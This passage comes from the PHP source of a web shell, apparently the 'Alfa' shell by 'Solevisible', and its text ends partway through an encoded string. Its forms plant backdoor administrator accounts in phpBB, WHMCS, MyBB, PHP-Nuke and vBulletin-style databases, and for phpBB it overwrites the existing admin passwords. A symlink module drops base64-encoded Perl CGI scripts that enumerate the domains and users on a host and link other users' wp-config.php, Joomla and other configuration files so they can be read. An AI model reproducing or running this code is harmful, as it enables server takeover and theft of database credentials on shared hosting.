2099. $solevisible=@mysql_query("insert into {$prefix}user (userid,usergroupid,username,password,salt,email) values(null,'6','$admin','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*<QN','$SQL')") or die(mysql_error());
2100. $solevisible=@mysql_query("select userid from {$prefix}user where username='".$admin."'") or die(mysql_error());
2101. $sole = mysql_num_rows($solevisible);
2102. if ($sole == 1){
2103. $solevis = mysql_fetch_assoc($solevisible);
2104. $res = $solevis['userid'];
2105. }
2106. $solevisible=@mysql_query("insert into {$prefix}administrator (userid,adminpermissions) values('".$res."','16744444')") or die(mysql_error());
2107. if($solevisible){
2108. echo "<center><br><b><script>alert('Success... ".$admin." is created :)')</script></b></center> "; }
2109. }
2110. }
2111. if ($_POST['alfa5'] && $_POST['alfa5'] == 'phpbb'){
2112. echo '<script>alfa1_=alfa2_=alfa3_=alfa4_=alfa6_=alfa7_=alfa8_=alfa9_=alfa10_=""</script>
2113. <b> <center><FORM onSubmit="g(\'pwchanger\',null,this.send.value,this.localhost.value,this.database.value,this.username.value,\'phpbb\',this.password.value,null,this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">
2114. <b><font color="#FFFF01">==</font> <font color="#00A220">Add</font> <font color="#FFFFFF">NewAdmin</font> <font color="#FF0000">phpBB</font><font color="#FFFF01"> ==</font></b>
2115. <p><table border=1>
2116. <tr><td><font color=#FFFFFF> host :</td>
2117. <td><INPUT size="30" value="localhost" name="localhost" type="text"></td></tr>
2118. <tr><td><font color=#FFFFFF>database: </td>
2119. <td><INPUT size="30" value="" name="database" type="text"></td></tr>
2120. <tr><td><font color=#FFFFFF>Table Prefix :</td>
2121. <td><INPUT size="30" value="" name="prefix" type="text"></td></tr>
2122. <tr><td><font color=#FFFFFF>username : </td>
2123. <td> <INPUT size="30" value="" name="username" type="text"></td></tr>
2124. <tr><td><font color=#FFFFFF>password : </td>
2125. <td> <INPUT size="30" value="" name="password" type="text"></td></tr>
2126. <tr><td><font color=#FF0000>Admin username:</td>
2127. <td><INPUT name="admin" size="30" value="admin"></td></tr>
2128. <tr><td><font color=#FF0000>Admin Password :<font color="#FFFFFF"></td>
2129. <td><INPUT name="toftof" size="30" value="solevisible" disabled/></td></tr>
2130. <tr><td><font color=#FF0000>Admin Email:</td>
2131. <td> <INPUT name="email" size="30" value="solevisible@fbi.gov"></td></tr>
2132. </table>
2133. <INPUT value=">>" name="send" type="submit">
2134. </FORM><center></b>';
2135. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
2136. $localhost = $_POST['alfa2'];
2137. $database = $_POST['alfa3'];
2138. $username = $_POST['alfa4'];
2139. $password = $_POST['alfa6'];
2140. $pwd = $_POST['alfa7'];
2141. $admin = $_POST['alfa8'];
2142. $SQL = $_POST['alfa9'];
2143. $prefix = $_POST['alfa10'];
2144. @mysql_connect($localhost,$username,$password) or die(mysql_error());
2145. @mysql_select_db($database) or die(mysql_error());
2146. $hash = md5($pwd);
2147. $solevisible=@mysql_query("UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE username_clean = 'admin'") or die(mysql_error());
2148. $solevisible=@mysql_query("UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE username_clean = 'admin'") or die(mysql_error());
2149. $solevisible=@mysql_query("UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE user_type = 3") or die(mysql_error());
2150. $solevisible=@mysql_query("UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE user_type = 3") or die(mysql_error());
2151. $solevisible=@mysql_query("UPDATE ".$prefix."users SET user_email ='".$SQL."' WHERE username_clean = 'admin'") or die(mysql_error());
2152. if($solevisible){
2153. echo "<center><br><b><script>alert('Success... ".$admin." is created :)')</script></b></center> ";
2154. }
2155. }
2156. }
2157. if ($_POST['alfa6'] && $_POST['alfa6'] == 'whmcs'){
2158. echo '<script>alfa1_=alfa2_=alfa3_=alfa4_=alfa5_=alfa7_=alfa8_=alfa9_=alfa10_=""</script>
2159. <b><center><FORM onSubmit="g(\'pwchanger\',null,this.send.value,this.localhost.value,this.database.value,this.username.value,this.password.value,\'whmcs\',null,this.admin.value,this.email.value); return false;" method="POST">
2160. <b><font color="#FFFF01">==</font> <font color="#00A220">Add</font> <font color="#FFFFFF">NewAdmin</font> <font color="#FF0000">Whmcs</font><font color="#FFFF01"> ==</font></b>
2161. <p><table border=1>
2162. <tr><td><font color=#FFFFFF> host :</td>
2163. <td><INPUT size="30" value="localhost" name="localhost" type="text"></td></tr>
2164. <tr><td><font color=#FFFFFF>database: </td>
2165. <td><INPUT size="30" value="" name="database" type="text"></td></tr>
2166. <tr><td><font color=#FFFFFF>username : </td>
2167. <td> <INPUT size="30" value="" name="username" type="text"></td></tr>
2168. <tr><td><font color=#FFFFFF>password : </td>
2169. <td> <INPUT size="30" value="" name="password" type="text"></td></tr>
2170. <tr><td><font color=#FF0000>Admin username:</td>
2171. <td><INPUT name="admin" size="30" value="admin"></td></tr>
2172. <tr><td><font color=#FF0000>Admin Password :<font color="#FFFFFF"></td>
2173. <td><INPUT name="toftof" size="30" value="solevisible" disabled/></td></tr>
2174. <tr><td><font color=#FF0000>Admin Email:</td>
2175. <td> <INPUT name="email" size="30" value="solevisible@fbi.gov"></td></tr>
2176. </table>
2177. <INPUT value=">>" name="send" type="submit">
2178. </FORM></center></b>';
2179. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
2180. $localhost = $_POST['alfa2'];
2181. $database = $_POST['alfa3'];
2182. $username = $_POST['alfa4'];
2183. $password = $_POST['alfa5'];
2184. $admin = $_POST['alfa8'];
2185. $SQL = $_POST['alfa9'];
2186. @mysql_connect($localhost,$username,$password) or die(mysql_error());
2187. @mysql_select_db($database) or die(mysql_error());
2188. $solevisible=@mysql_query("insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','".$admin."','d4a590caacc0be55ef286e40a945ea45','".$SQL."','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysql_error());
2189. if($solevisible){
2190. echo "<center><br><b><script>alert('Success... ".$admin." is created :)')</script></b></center> "; }
2191. }
2192. }
2193. if ($_POST['alfa7'] && $_POST['alfa7'] == 'mybb'){
2194. echo '<script>alfa1_=alfa2_=alfa3_=alfa4_=alfa5_=alfa6_=alfa8_=alfa9_=alfa10_=""</script>
2195. <b><center><FORM onsubmit="g(\'pwchanger\',null,this.send.value,this.localhost.value,this.database.value,this.username.value,this.password.value,null,\'mybb\',this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">
2196. <b><font color="#FFFF01">==</font> <font color="#00A220">Add</font> <font color="#FFFFFF">NewAdmin</font> <font color="#FF0000">Mybb</font><font color="#FFFF01"> ==</font></b>
2197. <p><table border=1>
2198. <tr><td><font color=#FFFFFF> host :</td>
2199. <td><INPUT size="30" value="localhost" name="localhost" type="text"></td></tr>
2200. <tr><td><font color=#FFFFFF>database: </td>
2201. <td><INPUT size="30" value="" name="database" type="text"></td></tr>
2202. <tr><td><font color=#FFFFFF>Table Prefix :</td>
2203. <td><INPUT size="30" value="" name="prefix" type="text"></td></tr>
2204. <tr><td><font color=#FFFFFF>username : </td>
2205. <td> <INPUT size="30" value="" name="username" type="text"></td></tr>
2206. <tr><td><font color=#FFFFFF>password : </td>
2207. <td> <INPUT size="30" value="" name="password" type="text"></td></tr>
2208. <tr><td><font color=#FF0000>Admin username:</td>
2209. <td><INPUT name="admin" size="30" value="admin"></td></tr>
2210. <tr><td><font color=#FF0000>Admin Password :<font color="#FFFFFF"></td>
2211. <td><INPUT name="toftof" size="30" value="solevisible" disabled/></td></tr>
2212. <tr><td><font color=#FF0000>Admin Email:</td>
2213. <td> <INPUT name="email" size="30" value="solevisible@fbi.gov"></td></tr>
2214. </table>
2215. <INPUT value=">>" name="send" type="submit">
2216. </FORM></center></b>';
2217. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
2218. $localhost = $_POST['alfa2'];
2219. $database = $_POST['alfa3'];
2220. $username = $_POST['alfa4'];
2221. $password = $_POST['alfa5'];
2222. $admin = $_POST['alfa8'];
2223. $SQL = $_POST['alfa9'];
2224. $prefix = $_POST['alfa10'];
2225. @mysql_connect($localhost,$username,$password) or die(mysql_error());
2226. @mysql_select_db($database) or die(mysql_error());
2227. $solevisible=@mysql_query("insert into ".$prefix."users (uid,username,password,salt,email,usergroup) values(null,'".$admin."','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','".$SQL."','4')") or die(mysql_error());
2228. if($solevisible){
2229. echo "<center><br><b><script>alert('Success... ".$admin." is created :)')</script></b></center> "; }
2230. }
2231. }
2232. if ($_POST['alfa8'] && $_POST['alfa8'] == 'nuke'){
2233. echo '<script>alfa1_=alfa2_=alfa3_=alfa4_=alfa5_=alfa6_=alfa7_=alfa9_=alfa10_=""</script>
2234. <b><center><FORM onsubmit="g(\'pwchanger\',null,this.send.value,this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'nuke\',this.email.value,this.prefix.value); return false;" method="POST">
2235. <b><font color="#FFFF01">==</font> <font color="#00A220">Add</font> <font color="#FFFFFF">NewAdmin</font> <font color="#FF0000">PhpNuke</font><font color="#FFFF01"> ==</font></b>
2236. <p><table border=1>
2237. <tr><td><font color=#FFFFFF> host :</td>
2238. <td><INPUT size="30" value="localhost" name="localhost" type="text"></td></tr>
2239. <tr><td><font color=#FFFFFF>database: </td>
2240. <td><INPUT size="30" value="" name="database" type="text"></td></tr>
2241. <tr><td><font color=#FFFFFF>Table Prefix :</td>
2242. <td><INPUT size="30" value="" name="prefix" type="text"></td></tr>
2243. <tr><td><font color=#FFFFFF>username : </td>
2244. <td> <INPUT size="30" value="" name="username" type="text"></td></tr>
2245. <tr><td><font color=#FFFFFF>password : </td>
2246. <td> <INPUT size="30" value="" name="password" type="text"></td></tr>
2247. <tr><td><font color=#FF0000>Admin username:</td>
2248. <td><INPUT name="admin" size="30" value="admin"></td></tr>
2249. <tr><td><font color=#FF0000>Admin Password :<font color="#FFFFFF"></td>
2250. <td><INPUT name="toftof" size="30" value="solevisible" disabled/></td></tr>
2251. <tr><td><font color=#FF0000>Admin Email:</td>
2252. <td> <INPUT name="email" size="30" value="solevisible@fbi.gov"></td></tr>
2253. </table>
2254. <INPUT value=">>" name="send" type="submit">
2255. </FORM></center></b>';
2256. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
2257. $localhost = $_POST['alfa2'];
2258. $database = $_POST['alfa3'];
2259. $username = $_POST['alfa4'];
2260. $password = $_POST['alfa5'];
2261. $admin = $_POST['alfa7'];
2262. $SQL = $_POST['alfa9'];
2263. $prefix = $_POST['alfa10'];
2264. @mysql_connect($localhost,$username,$password) or die(mysql_error());
2265. @mysql_select_db($database) or die(mysql_error());
2266. $hash = md5($pwd);
2267. $solevisible=@mysql_query("insert into ".prefix."_authors(aid,name,email,pwd) values('$admin','God','$SQL','d4a590caacc0be55ef286e40a945ea45')") or die(mysql_error());
2268. if($solevisible){
2269. echo "<center><br><b><script>alert('Success... ".$admin." is created :)')</script></b></center> ";
2270. }
2271. }
2272. }
2273. echo "</div>";
2274. alfafooter();
2275. }
2276. function alfasymlink()
2277. {
2278. alfahead();
2279. $solevisible8 = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
2280. $solevisible55=explode('/',$solevisible8 );
2281. $solevisible8 =str_replace($solevisible55[count($solevisible55)-1],'',$solevisible8 );
2282. echo '<div class=header><script>alfa1_=alfa2_=alfa3_=alfa4_=alfa5_=alfa6_=alfa7_=alfa8_="";</script><center><h3><span>| Symlink |</span></h3><center><h3><a href=# onclick="g(\'symlink\',null,\'website\',null)">| Domains(Cpanel) | </a><a href=# onclick="g(\'symlink\',null,null,\'whole\')">| Whole Symlink(Cpanel) | </a><a href=# onclick="g(\'symlink\',null,null,null,null,null,null,\'direct\')">| Whole Symlink(Direct-Admin) | </a><a href=# onclick="g(\'symlink\',null,null,null,\'config\')">| Config Symlink | </a><a href=# onclick="g(\'symlink\',null,null,null,null,\'SymFile\')">| File Symlink | </a><a href=# onclick="g(\'symlink\',null,null,null,null,null,\'cfucker\')">| Config Fucker | </a></h3></center>';
2283. if(isset($_POST['alfa8']) && $_POST['alfa8']=='userpl')
2284. {
2285. mkdir('userpl',0755);
2286. chdir('userpl');
2287. $solevisible7 = '.htaccess';
2288. $solevisible6 = "$solevisible7";
2289. $solevisible4 = fopen ($solevisible6 ,'w') or die ('ERROR!!!');
2290. $solevisible5 = 'Options FollowSymLinks MultiViews Indexes ExecCGI
2291. AddType application/x-httpd-cgi .alfa
2292. AddHandler cgi-script .alfa
2293. AddHandler cgi-script .alfa';
2294. fwrite ( $solevisible4 ,$solevisible5 ) ;
2295. fclose ($solevisible4);
2296. $solevisible3 = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCnByaW50JzwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj4NCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCg0KPGhlYWQ+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LUxhbmd1YWdlIiBjb250ZW50PSJlbi11cyIgLz4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04IiAvPg0KPHRpdGxlPi46OlNvbGV2c2libGUgR0VULVVzZXImZG9tYWluIFNoZWxsZXI6Oi48L3RpdGxlPg0KPHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCi5uZXdTdHlsZTEgew0KIGJhY2tncm91bmQtY29sb3I6ICMwMDAwMDA7DQogZm9udC1mYW1pbHk6ICJDb3VyaWVyIE5ldyIsIENvdXJpZXIsIG1vbm9zcGFjZTsNCiBmb250LXNpemU6IGxhcmdlOw0KIGZvbnQtd2VpZ2h0OiBib2xkOw0KfQ0KDQoNCg0KDQoNCi5zdHlsZTEgew0KIHRleHQtYWxpZ246IGNlbnRlcjsNCiBjb2xvcjojZmZmZmZmOw0KdGV4dC1kZWNvcmF0aW9uOm5vbmU7DQoJLW1vei10cmFuc2l0aW9uOiBhbGwgMC4zcyBlYXNlLW91dDstby10cmFuc2l0aW9uOiBhbGwgMC4zcyBlYXNlLW91dDstd2Via2l0LXRyYW5zaXRpb246IGFsbCAwLjNzIGVhc2Utb3V0O3RyYW5zaXRpb246IGFsbCAwLjNzIGVhc2Utb3V0DQoNCn0NCi5zdHlsZTE6aG92ZXIgew0KIHRleHQtYWxpZ246IGNlbnRlcjsNCiBjb2xvcjojZmYwMDAwOw0KdGV4dC1kZWNvcmF0aW9uOm5vbmU7DQp9DQoNCg0KPC9zdHlsZT4NCjwvaGVhZD4NCg0KPGJvZHkgY2xhc3M9Im5ld1N0eWxlMSI+DQoNCg0KDQonOw0Kb3BlbiAoZDBtYWlucywgJy9ldGMvbmFtZWQuY29uZicpIG9yICRlcnI9MTsNCkBrciA9IDxkMG1haW5zPjsNCmNsb3NlIGQwbWFpbnM7DQppZiAoJGVycil7DQpwcmludCAoJzxwIGNsYXNzPSJzdHlsZTEiPiZuYnNwOzwvcD48cCBjbGFzcz0ic3R5bGUxIj5DMHVsZG5cJ3QgQnlwYXNzIGl0ICwgU29ycnk8L3A+Jyk7DQpkaWUoKTsNCn1lbHNlew0KcHJpbnQgJzxwIGNsYXNzPSJzdHlsZTEiPiZuYnNwOzwvcD4NCjxwIGNsYXNzPSJzdHlsZTEiPjxiPjxiaWc+PGZvbnQgY29sb3I9InJlZCI+Q29kZWQgQnkgPC9mb250Pjxmb250IGNvbG9yPSJncmVlbiI+U29sZSBTYWQgJiBJbnZpc2libGU8L2ZvbnQ+PC9iPjwvYmlnPjxicj48YnI+IDxmb250IGNvbG9yPSJyZWQiPjxiPjxiaWc+Q29udGFjdCA6IDwvYj48L2JpZz48L2ZvbnQ+PGZvbnQgY29sb3I9ImdyZWVuIj48Yj48YmlnPnNvbGV2aXNpYmxlQGdtYWlsLmNvbTwvYj48L2JpZz48L2ZvbnQ+PGJyPjxicj48Zm9udCBjb2xvcj0iZ29sZCI+SGVyZSBJcyBBbGwgRG9taW5zICYgVXNlcnMgOjwvZm9udD48L3A+DQonO30NCmZvcmVhY2ggbXkgJG9uZSAoQGtyKQ0Kew0KaWYoJG9uZSA9fiBtLy4qP3pvbmUgIiguKj8pIiB7Lyl7DQokZmlsZW5hbWU9ICIvZXRjL3ZhbGlhc2VzLyIuJDE7DQokb3duZXIgPSBnZXRwd3VpZCgoc3RhdCgkZmlsZW5hbWUpKVs0XSk7DQpwcmludCAnPHAgY2xhc3M9InN0eWxlMSI+Jy4kMS4nIDogJy4kb3duZXIuJzwvcD4NCic7DQp9DQp9DQpwcmludCc8L2JvZHk+PC9odG1sPic7';
2297. $solevisible1 = fopen('user.alfa','w+');
2298. $solevisible2 = fwrite ($solevisible1 ,base64_decode($solevisible3));
2299. fclose($solevisible1);
2300. chmod('user.alfa',0755);
2301. echo '<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><iframe src=userpl/user.alfa width=100% height=600px frameborder=0></iframe> ';
2302. }
2303. if(isset($_POST['alfa5']) && $_POST['alfa5']=='cfucker')
2304. {
2305. mkdir('alfaconfig',0755);
2306. chdir('alfaconfig');
2307. $solevisible7 = '.htaccess';
2308. $solevisible6 = "$solevisible7";
2309. $solevisible4 = fopen ($solevisible6 ,'w') or die ('ERROR!!!');
2310. $solevisible5 = 'Options FollowSymLinks MultiViews Indexes ExecCGI
2311. AddType application/x-httpd-cgi .alfa
2312. AddHandler cgi-script .alfa
2313. AddHandler cgi-script .alfa';
2314. fwrite ( $solevisible4 ,$solevisible5 ) ;
2315. fclose ($solevisible4);
2316. $solevisible3 = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCnByaW50JzwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj4NCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1MYW5ndWFnZSIgY29udGVudD0iZW4tdXMiIC8+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4NCjx0aXRsZT5Tb2xldmlzaWJsZSBDb25maWcgRnVja2VyPC90aXRsZT4NCjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQouc29sZXZpc2libGUgew0KICAgIGZvbnQtZmFtaWx5OiBUYWhvbWE7DQogICAgZm9udC1zaXplOiAxNHB4Ow0KICAgIGZvbnQtd2VpZ2h0OiBib2xkOw0KICAgIGNvbG9yOiAjMzMzM2ZmOw0KICAgIHRleHQtYWxpZ246IGNlbnRlcjsNCiAgICB0ZXh0LXNoYWRvdzogYmxhY2sgMHB4IDBweCAycHg7DQp9DQojY2hlY2tvdXR0ZXh0YXJlYSB7DQoNCiAgd2Via2l0LWJvcmRlci1yYWRpdXM6IDE1cHg7DQoNCn0NCjwvc3R5bGU+DQo8L2hlYWQ+DQonOw0Kc3ViIGxpbHsNCiAgICAoJHVzZXIpID0gQF87DQokbXNyID0gcXh7cHdkfTsNCiRrb2xhPSRtc3IuIi8iLiR1c2VyOw0KJGtvbGE9fnMvXG4vL2c7IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2hvcC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vcy9pbmNsdWRlcy9jb25maWd1cmUucGhwJywka29sYS4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1vc2NvbS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vc2NvbW1lcmNlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictb3Njb21tZXJjZS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vc2NvbW1lcmNlcy9pbmNsdWRlcy9jb25maWd1cmUucGhwJywka29sYS4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1zaG9wMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zaG9wcGluZy9pbmNsdWRlcy9jb25maWd1cmUucGhwJywka29sYS4nLXNob3Atc2hvcHBpbmcudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2FsZS9pbmNsdWRlcy9jb25maWd1cmUucGhwJywka29sYS4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJGtvbGEuJy1hbWVtYmVyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZy5pbmMucGhwJywka29sYS4nLWFtZW1iZXIyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21lbWJlcnMvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywka29sYS4nLTIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJy1mb3J1bS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bXMvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJy1mb3J1bXMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYWRtaW4vY29uZi5waHAnLCRrb2xhLictNS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25maWcucGhwJywka29sYS4nLTQudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cDEzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AxMy13cC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9XUC93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtV1AudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd3AvYmV0YS93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtd3AtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9iZXRhL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AxMy1iZXRhLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AxMy1wcmVzcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93b3JkcHJlc3Mvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cDEzLXdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9Xb3JkcHJlc3Mvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cDEzLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtd29yZHByZXNzLWJldGEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3cy93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXcvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cDEzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9nL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9iZXRhL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9ncy93cC1jb25maWcucGhwJywka29sYS4nLXdwLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvbWUvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cC1ob21lLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Byb3RhbC93cC1jb25maWcucGhwJywka29sYS4nLXdwLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zaXRlL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3Atc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9tYWluL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC90ZXN0L3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25mX2dsb2JhbC5waHAnLCRrb2xhLictNi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2RiLnBocCcsJGtvbGEuJy03LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Nvbm5lY3QucGhwJywka29sYS4nLTgudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWtfY29uZi5waHAnLCRrb2xhLictOS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2NvbmZpZy5waHAnLCRrb2xhLictMTIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvam9vbWxhL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYS1wcm90YWwudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvam9vL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvby50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jbXMvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYS1zaXRlLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21haW4vY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLW1haW4udHh0Jy